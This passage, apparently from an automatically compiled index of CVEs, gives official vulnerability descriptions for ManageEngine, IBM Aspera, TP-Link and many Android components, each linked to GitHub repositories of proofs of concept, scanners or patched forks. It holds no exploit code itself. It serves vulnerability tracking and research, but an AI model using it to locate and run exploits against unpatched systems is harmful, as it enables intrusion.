Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache Santuario xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections. This affects Access Manager Plus before 4308, Active Directory 360 before 4310, ADAudit Plus before 7081, ADManager Plus before 7162, ADSelfService Plus before 6211, Analytics Plus before 5150, Application Control Plus before 10.1.2220.18, Asset Explorer before 6983, Browser Security Plus before 11.1.2238.6, Device Control Plus before 10.1.2220.18, Endpoint Central before 10.1.2228.11, Endpoint Central MSP before 10.1.2228.11, Endpoint DLP before 10.1.2137.6, Key Manager Plus before 6401, OS Deployer before 1.1.2243.1, PAM 360 before 5713, Password Manager Pro before 12124, Patch Manager Plus before 10.1.2220.18, Remote Access Plus before 10.1.2228.11, Remote Monitoring and Management (RMM) before 10.1.41, ServiceDesk Plus before 14004, ServiceDesk Plus MSP before 13001, SupportCenter Plus before 11026, and Vulnerability Manager Plus before 10.1.2220.18. Exploitation is only possible if SAML SSO has ever been configured for a product (for some products, exploitation requires that SAML SSO is currently active).

- [horizon3ai/CVE-2022-47966](https://github.com/horizon3ai/CVE-2022-47966)
- [shameem-testing/PoC-for-ME-SAML-Vulnerability](https://github.com/shameem-testing/PoC-for-ME-SAML-Vulnerability)
- [Inplex-sys/CVE-2022-47966](https://github.com/Inplex-sys/CVE-2022-47966)
- [ACE-Responder/CVE-2022-47966_checker](https://github.com/ACE-Responder/CVE-2022-47966_checker)
- [vonahisec/CVE-2022-47966-Scan](https://github.com/vonahisec/CVE-2022-47966-Scan)

### CVE-2022-47986 (2023-02-17)

IBM Aspera Faspex 4.4.2 Patch Level 1 and earlier could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2. IBM X-Force ID: 243512.

- [ohnonoyesyes/CVE-2022-47986](https://github.com/ohnonoyesyes/CVE-2022-47986)
- [dhina016/CVE-2022-47986](https://github.com/dhina016/CVE-2022-47986)
- [mauricelambert/CVE-2022-47986](https://github.com/mauricelambert/CVE-2022-47986)

### CVE-2022-48150 (2023-04-21)

Shopware v5.5.10 was discovered to contain a cross-site scripting (XSS) vulnerability via the recovery/install/ URI.

- [sahilop123/-CVE-2022-48150](https://github.com/sahilop123/-CVE-2022-48150)

### CVE-2022-48194 (2022-12-30)

TP-Link TL-WR902AC devices through V3 0.9.1 allow remote authenticated attackers to execute arbitrary code or cause a Denial of Service (DoS) by uploading a crafted firmware update because the signature check is inadequate.

- [otsmr/internet-of-vulnerable-things](https://github.com/otsmr/internet-of-vulnerable-things)

### CVE-2022-48197 (2023-01-02)

Reflected cross-site scripting (XSS) exists in Sandbox examples in the YUI2 repository. The download distributions, TreeView component and the YUI Javascript library overall are not affected. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

- [ryan412/CVE-2022-48197](https://github.com/ryan412/CVE-2022-48197)

### CVE-2022-48311 (2023-02-06)

**UNSUPPORTED WHEN ASSIGNED** Cross Site Scripting (XSS) in HP Deskjet 2540 series printer Firmware Version CEP1FN1418BR and Product Model Number A9U23B allows an authenticated attacker to inject their own script into the page via the HTTP configuration page. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

- [swzhouu/CVE-2022-48311](https://github.com/swzhouu/CVE-2022-48311)

### CVE-2022-48429 (2023-03-27)

In JetBrains Hub before 2022.3.15573, 2022.2.15572, 2022.1.15583 reflected XSS in dashboards was possible.

- [echo-devim/CVE-2022-48429_poc](https://github.com/echo-devim/CVE-2022-48429_poc)

### CVE-2022-48474 (2023-09-12)

Control de Ciber, in its 1.650 version, is affected by a Denial of Service condition through the version function. Sending a malicious request could cause the server to check if an unrecognized component is up to date, causing a memory failure error that shuts down the process.

- [sapellaniz/CVE-2022-48474_CVE-2022-48475](https://github.com/sapellaniz/CVE-2022-48474_CVE-2022-48475)

### CVE-2022-48565 (2023-08-22)

An XML External Entity (XXE) issue was discovered in Python through 3.9.1. The plistlib module no longer accepts entity declarations in XML plist files to avoid XML vulnerabilities.

- [Einstein2150/CVE-2022-48565-POC](https://github.com/Einstein2150/CVE-2022-48565-POC)

## 2021
### CVE-2021-0302 (2021-02-10)

In PackageInstaller, there is a possible tapjacking attack due to an insecure default value. This could lead to local escalation of privilege and permissions with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10; Android ID: A-155287782.

- [ShaikUsaf/packages_apps_PackageInstaller_AOSP10_r33_CVE-2021-0302](https://github.com/ShaikUsaf/packages_apps_PackageInstaller_AOSP10_r33_CVE-2021-0302)

### CVE-2021-0306 (2021-01-11)

In addAllPermissions of PermissionManagerService.java, there is a possible permissions bypass when upgrading major Android versions which allows an app to gain the android.permission.ACTIVITY_RECOGNITION permission without user confirmation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-8.0, Android-8.1, Android-9, Android-10; Android ID: A-154505240.

- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0306_CVE-2021-0317](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0306_CVE-2021-0317)

### CVE-2021-0308 (2021-01-11)

In ReadLogicalParts of basicmbr.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11, Android-8.0; Android ID: A-158063095.

- [Trinadh465/platform_external_gptfdisk_AOSP10_r33_CVE-2021-0308](https://github.com/Trinadh465/platform_external_gptfdisk_AOSP10_r33_CVE-2021-0308)

### CVE-2021-0313 (2021-01-11)

In isWordBreakAfter of LayoutUtils.cpp, there is a possible way to slow or crash a TextView due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9, Android-10, Android-11, Android-8.0, Android-8.1; Android ID: A-170968514.

- [Satheesh575555/frameworks_minikin_AOSP10_r33_CVE-2021-0313](https://github.com/Satheesh575555/frameworks_minikin_AOSP10_r33_CVE-2021-0313)

### CVE-2021-0314 (2021-02-10)

In onCreate of UninstallerActivity, there is a possible way to uninstall an app without informed user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-10, Android-11, Android-8.1, Android-9; Android ID: A-171221302.

- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0314](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0314)

### CVE-2021-0315 (2021-01-11)

In onCreate of GrantCredentialsPermissionActivity.java, there is a possible way to convince the user to grant an app access to an account due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11, Android-8.0; Android ID: A-169763814.

- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0315](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0315)
- [pazhanivel07/frameworks_base_Aosp10_r33_CVE-2021-0315](https://github.com/pazhanivel07/frameworks_base_Aosp10_r33_CVE-2021-0315)
- [nanopathi/frameworks_base1_CVE-2021-0315](https://github.com/nanopathi/frameworks_base1_CVE-2021-0315)

### CVE-2021-0316 (2021-01-11)

In avrc_pars_vendor_cmd of avrc_pars_tg.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-8.0, Android-8.1, Android-9, Android-10; Android ID: A-168802990.

- [Satheesh575555/system_bt_AOSP_10_r33_CVE-2021-0316](https://github.com/Satheesh575555/system_bt_AOSP_10_r33_CVE-2021-0316)

### CVE-2021-0318 (2021-01-11)

In appendEventsToCacheLocked of SensorEventConnection.cpp, there is a possible out of bounds write due to a use-after-free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9, Android-8.1, Android-10, Android-11; Android ID: A-168211968.

- [nanopathi/frameworks_native_AOSP10_r33_CVE-2021-0318](https://github.com/nanopathi/frameworks_native_AOSP10_r33_CVE-2021-0318)

### CVE-2021-0319 (2021-01-11)

In checkCallerIsSystemOr of CompanionDeviceManagerService.java, there is a possible way to get a nearby Bluetooth device's MAC address without appropriate permissions due to a permissions bypass. This could lead to local escalation of privilege that grants access to nearby MAC addresses, with User execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.0, Android-8.1, Android-9, Android-10, Android-11; Android ID: A-167244818.

- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0319](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0319)

### CVE-2021-0325 (2021-02-10)

In ih264d_parse_pslice of ih264d_parse_pslice.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11; Android ID: A-174238784.

- [nanopathi/external_libavc_AOSP10_r33_CVE-2021-0325](https://github.com/nanopathi/external_libavc_AOSP10_r33_CVE-2021-0325)

### CVE-2021-0326 (2021-02-10)

In p2p_copy_client_info of p2p.c, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution if the target device is performing a Wi-Fi Direct search, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11, Android-8.1, Android-9; Android ID: A-172937525.

- [aemmitt-ns/skeleton](https://github.com/aemmitt-ns/skeleton)
- [nanopathi/wpa_supplicant_8_CVE-2021-0326.](https://github.com/nanopathi/wpa_supplicant_8_CVE-2021-0326.)
- [Satheesh575555/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0326](https://github.com/Satheesh575555/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0326)
- [nanopathi/Packages_wpa_supplicant8_CVE-2021-0326](https://github.com/nanopathi/Packages_wpa_supplicant8_CVE-2021-0326)
- [ShaikUsaf/external_wpa_supplicant_8_AOSP10_r33CVE-2021-0326](https://github.com/ShaikUsaf/external_wpa_supplicant_8_AOSP10_r33CVE-2021-0326)

### CVE-2021-0327 (2021-02-10)

In getContentProviderImpl of ActivityManagerService.java, there is a possible permission bypass due to non-restored binder identities. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9, Android-10, Android-11, Android-8.1; Android ID: A-172935267.

- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0327](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0327)

### CVE-2021-0328 (2021-02-10)

In onBatchScanReports and deliverBatchScan of GattService.java, there is a possible way to retrieve Bluetooth scan results without permissions due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11, Android-8.1, Android-9; Android ID: A-172670415.

- [ShaikUsaf/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0328](https://github.com/ShaikUsaf/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0328)

### CVE-2021-0329 (2021-02-10)

In several native functions called by AdvertiseManager.java, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege in the Bluetooth server with User execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9, Android-10, Android-11, Android-8.1; Android ID: A-171400004.

- [ShaikUsaf/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0329](https://github.com/ShaikUsaf/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0329)

### CVE-2021-0330 (2021-02-10)

In add_user_ce and remove_user_ce of storaged.cpp, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in storaged with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9, Android-10, Android-11; Android ID: A-170732441.

- [Satheesh575555/system_core_AOSP10_r33-CVE-2021-0330](https://github.com/Satheesh575555/system_core_AOSP10_r33-CVE-2021-0330)

### CVE-2021-0331 (2021-02-10)

In onCreate of NotificationAccessConfirmationActivity.java, there is a possible overlay attack due to an insecure default value. This could lead to local escalation of privilege and notification access with User execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-9, Android-10, Android-11, Android-8.1; Android ID: A-170731783.

- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0331](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0331)

### CVE-2021-0332 (2021-02-10)

In bootFinished of SurfaceFlinger.cpp, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-10; Android ID: A-169256435.

- [Satheesh575555/frameworks_native_AOSP10_r33_CVE-2021-0332](https://github.com/Satheesh575555/frameworks_native_AOSP10_r33_CVE-2021-0332)

### CVE-2021-0333 (2021-02-10)

In onCreate of BluetoothPermissionActivity.java, there is a possible permissions bypass due to a tapjacking overlay that obscures the phonebook permissions dialog when a Bluetooth device is connecting. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11; Android ID: A-168504491.

- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0333](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0333)

### CVE-2021-0334 (2021-02-10)

In onTargetSelected of ResolverActivity.java, there is a possible settings bypass allowing an app to become the default handler for arbitrary domains. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11; Android ID: A-163358811.

- [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0334](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0334)

### CVE-2021-0336 (2021-02-10)

In onReceive of BluetoothPermissionRequest.java, there is a possible permissions bypass due to a mutable PendingIntent. This could lead to local escalation of privilege that bypasses a permission check, with User execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9, Android-10, Android-11, Android-8.1; Android ID: A-158219161.

- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2021-0336](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2021-0336)

### CVE-2021-0337 (2021-02-10)

In moveInMediaStore of FileSystemProvider.java, there is a possible file exposure due to stale metadata. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11; Android ID: A-157474195.

- [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0337](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0337)

### CVE-2021-0339 (2021-02-10)

In loadAnimation of WindowContainer.java, there is a possible way to keep displaying a malicious app while a target app is brought to the foreground. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-10, Android-8.1, Android-9; Android ID: A-145728687.

- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0339](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0339)

### CVE-2021-0340 (2021-02-10)

In parseNextBox of IsoInterface.java, there is a possible leak of unredacted location information due to improper input validation. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-10; Android ID: A-134155286.

- [Satheesh575555/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340](https://github.com/Satheesh575555/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340)
- [nanopathi/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340](https://github.com/nanopathi/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340)

### CVE-2021-0390 (2021-03-10)

In various methods of WifiNetworkSuggestionsManager.java, there is a possible modification of suggested networks due to a missing permission check. This could lead to local escalation of privilege by a background user on the same device with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-8.1, Android-9, Android-10; Android ID: A-174749461.

- [uthrasri/frameworks_opt_net_wifi_CVE-2021-0390](https://github.com/uthrasri/frameworks_opt_net_wifi_CVE-2021-0390)

### CVE-2021-0391 (2021-03-10)

In onCreate() of ChooseTypeAndAccountActivity.java, there is a possible way to learn the existence of an account, without permissions, due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-11, Android-8.1, Android-9, Android-10; Android ID: A-172841550.

- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0391](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0391)

### CVE-2021-0392 (2021-03-10)

In main of main.cpp, there is a possible memory corruption due to a double free. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11, Android-9; Android ID: A-175124730.

- [uthrasri/System_Connectivity_Wificond_CVE-2021-0392](https://github.com/uthrasri/System_Connectivity_Wificond_CVE-2021-0392)

### CVE-2021-0393 (2021-03-10)

In Scanner::LiteralBuffer::NewCapacity of scanner.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution if an attacker can supply a malicious PAC file, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-8.1, Android-9, Android-10; Android ID: A-168041375.

- [Trinadh465/external_v8_AOSP10_r33_CVE-2021-0393](https://github.com/Trinadh465/external_v8_AOSP10_r33_CVE-2021-0393)

### CVE-2021-0394 (2021-03-10)

In android_os_Parcel_readString8 of android_os_Parcel.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-8.1, Android-9, Android-10; Android ID: A-172655291.

- [nanopathi/packages_apps_Settings_CVE-2021-0394](https://github.com/nanopathi/packages_apps_Settings_CVE-2021-0394)
- [Trinadh465/platform_art_CVE-2021-0394](https://github.com/Trinadh465/platform_art_CVE-2021-0394)

### CVE-2021-0396 (2021-03-10)

In Builtins::Generate_ArgumentsAdaptorTrampoline of builtins-arm.cc and related files, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote code execution in an unprivileged process with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11; Android ID: A-160610106.

- [Satheesh575555/external_v8_AOSP10_r33_CVE-2021-0396](https://github.com/Satheesh575555/external_v8_AOSP10_r33_CVE-2021-0396)

### CVE-2021-0397 (2021-03-10)

In sdp_copy_raw_data of sdp_discovery.cc, there is a possible system compromise due to a double free. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-8.1, Android-9, Android-10; Android ID: A-174052148.

- [Satheesh575555/System_bt_AOSP10-r33_CVE-2021-0397](https://github.com/Satheesh575555/System_bt_AOSP10-r33_CVE-2021-0397)

### CVE-2021-0399 (2021-03-10)

In qtaguid_untag of xt_qtaguid.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android kernel; Android ID: A-176919394; References: Upstream kernel.

- [nipund513/Exploiting-UAF-by-Ret2bpf-in-Android-Kernel-CVE-2021-0399-](https://github.com/nipund513/Exploiting-UAF-by-Ret2bpf-in-Android-Kernel-CVE-2021-0399-)

### CVE-2021-0431 (2021-04-13)

In avrc_msg_cback of avrc_api.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure to a paired device with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-8.1, Android-9, Android-10; Android ID: A-174149901.

- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0431](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0431)
- [nanopathi/system_bt_AOSP10_r33_CVE-2021-0431](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0431)

### CVE-2021-0433 (2021-04-13)

In onCreate of DeviceChooserActivity.java, there is a possible way to bypass user consent when pairing a Bluetooth device due to a tapjacking/overlay attack. This could lead to local escalation of privilege and pairing malicious devices with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11; Android ID: A-171221090.

- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0433](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0433)

### CVE-2021-0435 (2021-04-13)

In avrc_proc_vendor_command of avrc_api.cc, there is a possible leak of heap data due to uninitialized data. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-8.1, Android-9, Android-10; Android ID: A-174150451.

- [nanopathi/system_bt_AOSP10_r33_CVE-2021-0435](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0435)
- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0435](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0435)

### CVE-2021-0437 (2021-04-13)

In setPlayPolicy of DrmPlugin.cpp, there is a possible double free. This could lead to local escalation of privilege in a privileged process with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-8.1, Android-9, Android-10; Android ID: A-176168330.

- [nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0437](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0437)

### CVE-2021-0466 (2021-06-11)

In startIpClient of ClientModeImpl.java, there is a possible identifier which could be used to track a device. This could lead to remote information disclosure to a proximal attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10; Android ID: A-154114734.

- [uthrasri/frameworks_opt_net_wifi_CVE-2021-0466](https://github.com/uthrasri/frameworks_opt_net_wifi_CVE-2021-0466)

### CVE-2021-0472 (2021-06-11)

In shouldLockKeyguard of LockTaskController.java, there is a possible way to exit App Pinning without a PIN due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-9, Android-10; Android ID: A-176801033.

- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0472](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0472)

### CVE-2021-0474 (2021-06-11)

In avrc_msg_cback of avrc_api.cc, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-8.1, Android-9, Android-10; Android ID: A-177611958.

- [pazhanivel07/system_bt_A10-r33_CVE-2021-0474](https://github.com/pazhanivel07/system_bt_A10-r33_CVE-2021-0474)
- [pazhanivel07/system_bt_A10_r33_CVE-2021-0474](https://github.com/pazhanivel07/system_bt_A10_r33_CVE-2021-0474)

### CVE-2021-0475 (2021-06-11)

In on_l2cap_data_ind of btif_sock_l2cap.cc, there is a possible memory corruption due to a use after free. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-10; Android ID: A-175686168.

- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0475](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0475)

### CVE-2021-0476 (2021-06-11)

In FindOrCreatePeer of btif_av.cc, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-9, Android-10; Android ID: A-169252501.

- [nanopathi/system_bt_AOSP10_r33_CVE-2021-0476](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0476)

### CVE-2021-0478 (2021-06-21)

In updateDrawable of StatusBarIconView.java, there is a possible permission bypass due to an uncaught exception. This could lead to local escalation of privilege by running foreground services without notifying the user, with User execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11, Android-8.1, Android-9; Android ID: A-169255797.

- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0478](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0478)

### CVE-2021-0481 (2021-06-11)

In onActivityResult of EditUserPhotoController.java, there is a possible access of unauthorized files due to an unexpected URI handler. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11; Android ID: A-172939189.

- [ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2021-0481](https://github.com/ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2021-0481)

### CVE-2021-0506 (2021-06-21)

In ActivityPicker.java, there is a possible bypass of user interaction in intent resolution due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-10, Android-11, Android-8.1, Android-9; Android ID: A-181962311.

- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0506](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0506)

### CVE-2021-0507 (2021-06-21)

In handle_rc_metamsg_cmd of btif_rc.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-8.1, Android-9, Android-10; Android ID: A-181860042.

- [nanopathi/system_bt_AOSP10_r33_CVE-2021-0507](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0507)

### CVE-2021-0508 (2021-06-21)

In various functions of DrmPlugin.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11; Android ID: A-176444154.

- [nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0508](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0508)

### CVE-2021-0509 (2021-06-21)

In various functions of CryptoPlugin.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9, Android-10, Android-11, Android-8.1; Android ID: A-176444161.

- [Trinadh465/frameworks_av_AOSP10_r33_CVE-2021-0509](https://github.com/Trinadh465/frameworks_av_AOSP10_r33_CVE-2021-0509)

### CVE-2021-0510 (2021-06-21)

In decrypt_1_2 of CryptoPlugin.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9, Android-10, Android-11, Android-8.1; Android ID: A-176444622.

- [pazhanivel07/hardware_interfaces-A10_r33_CVE-2021-0510](https://github.com/pazhanivel07/hardware_interfaces-A10_r33_CVE-2021-0510)

### CVE-2021-0511 (2021-06-21)

In Dex2oat of dex2oat.cc, there is a possible way to inject bytecode into an app due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9, Android-10, Android-11; Android ID: A-178055795.

- [Trinadh465/platform_art_AOSP10_r33_CVE-2021-0511](https://github.com/Trinadh465/platform_art_AOSP10_r33_CVE-2021-0511)

### CVE-2021-0513 (2021-06-21)

In deleteNotificationChannel and related functions of NotificationManagerService.java, there is a possible permission bypass due to improper state validation. This could lead to local escalation of privilege via hidden services with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9, Android-10, Android-11, Android-8.1; Android ID: A-156090809.

- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0513](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0513)

### CVE-2021-0516 (2021-06-21)

In p2p_process_prov_disc_req of p2p_pd.c, there is a possible out of bounds read and write due to a use after free. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-8.1, Android-9, Android-10; Android ID: A-181660448.

- [Satheesh575555/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0516](https://github.com/Satheesh575555/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0516)

### CVE-2021-0519 (2021-08-17)

In BITSTREAM_FLUSH of ih264e_bitstream.h, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11, Android-8.1, Android-9; Android ID: A-176533109.

- [nanopathi/external_libavc_AOSP10_r33_CVE-2021-0519](https://github.com/nanopathi/external_libavc_AOSP10_r33_CVE-2021-0519)

### CVE-2021-0520 (2021-06-21)

In several functions of MemoryFileSystem.cpp and related files, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11 Android-10. Android ID: A-176237595

- [nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0520](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0520)
- [ShaikUsaf/frameworks_av_AOSP10_r33_CVE-2021-0520](https://github.com/ShaikUsaf/frameworks_av_AOSP10_r33_CVE-2021-0520)

### CVE-2021-0522 (2021-06-21)

In ConnectionHandler::SdpCb of connection_handler.cc, there is a possible out of bounds read due to a use after free. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11 Android-9 Android-10. Android ID: A-174182139

- [nanopathi/system_bt_AOSP10_r33_CVE-2021-0522](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0522)

### CVE-2021-0586 (2021-07-14)

